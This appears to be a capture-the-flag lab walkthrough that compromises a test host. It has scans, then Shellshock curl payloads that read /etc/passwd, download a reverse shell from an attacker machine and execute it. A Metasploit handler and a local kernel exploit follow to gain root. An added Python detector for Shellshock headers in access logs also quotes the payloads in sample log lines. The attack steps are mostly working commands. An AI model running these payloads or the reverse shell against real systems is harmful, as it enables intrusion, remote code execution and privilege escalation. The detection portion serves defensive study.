Start scanning the target with nmap -A -T4 -p- 192.168.1.10 -vv

Then dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

Didn't get much from it, so I decided to run nikto -h 192.168.1.10

The target has the vulnerability CVE-2014-6271; I googled it and found out it's the Shellshock vulnerability, and there is a way to view the target's passwd file:
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/cat /etc/passwd' http://192.168.1.10/cgi-bin/test

Also, to view the user id:
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /usr/bin/id' http://192.168.1.10/cgi-bin/test

Now let’s create a reverse shell and try to upload it to the target:

Then upload the shell file to the target:
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /usr/bin/wget http://192.168.1.8/shell -P /tmp' http://192.168.1.10/cgi-bin/test
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls -la /tmp' http://192.168.1.10/cgi-bin/test

curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/chmod +x "/tmp/shell"' http://192.168.1.10/cgi-bin/test
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/bash -c "/tmp/shell"' http://192.168.1.10/cgi-bin/test
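From the defender's side, every one of the curl requests above leaves a distinctive trace in the web server's access log, because the Shellshock payload has to start with the bash exported-function prefix "() {" inside a header that the CGI handler exports as an environment variable. The following is an added example, not part of the original write-up: it parses Apache/nginx combined-format log lines and reports the source, request, header and trailing command for each request carrying that prefix in Referer or User-Agent. The log lines are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed combined-format access log lines (not from the original page);
# the first, second and fourth mimic the requests shown in the write-up.
SAMPLE_LOG = """\
192.168.1.8 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/test HTTP/1.1" 200 1042 "-" "() { :;}; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd"
192.168.1.8 - - [10/Oct/2014:13:55:40 +0000] "GET /cgi-bin/test HTTP/1.1" 200 64 "-" "() { :;}; echo Content-Type: text/plain; echo; /usr/bin/wget http://192.168.1.8/shell -P /tmp"
10.0.0.5 - - [10/Oct/2014:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2014:13:56:10 +0000] "GET /cgi-bin/test HTTP/1.1" 200 40 "() { :; }; /usr/bin/id" "curl/7.38.0"
"""

# Apache/nginx "combined" format: ip ident user [ts] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash exported-function prefix "() { ... };" followed by the command that a
# vulnerable bash executes while importing the environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<command>.*)$')

HEADER_NAMES = {"referer": "Referer", "ua": "User-Agent"}


def detect_shellshock(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per header value that carries a Shellshock payload."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline should count these, not drop them
        # Both headers reach a CGI script as HTTP_REFERER / HTTP_USER_AGENT variables.
        for group, name in HEADER_NAMES.items():
            hit = SHELLSHOCK_RE.search(m.group(group))
            if hit:
                findings.append({
                    "ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "request": m.group("req"),
                    "status": m.group("status"),
                    "header": name,
                    "command": hit.group("command").strip(),
                })
    return findings

if __name__ == "__main__":
    for f in detect_shellshock(SAMPLE_LOG):
        print(f"{f['ip']} {f['request']!r} via {f['header']}: {f['command']}")
```

A 200 status on a /cgi-bin/ request that carries the prefix is the strongest signal that the script actually ran; the same pattern applies to any other header the server exports (Cookie, Host, custom headers), so in practice the check belongs on the full header set, not only the two fields the combined format records.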

At the same time start Metasploit and set it up like this:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.8
set lport 4444

And we got a shell back. Now let's see the version and kernel of this box:

Let's search for this output with searchsploit:

locate 33589.c
cp /usr/share/exploitdb/exploits/linux_x86-64/local/33589.c ~/vnik.c
Then transfer it to the target using wget http://192.168.1.8/vnik.c
gcc vnik.c -O2 -o vnik
uname -r
./vnik 0
And when you get root privileges, grab the flag in the /root directory:
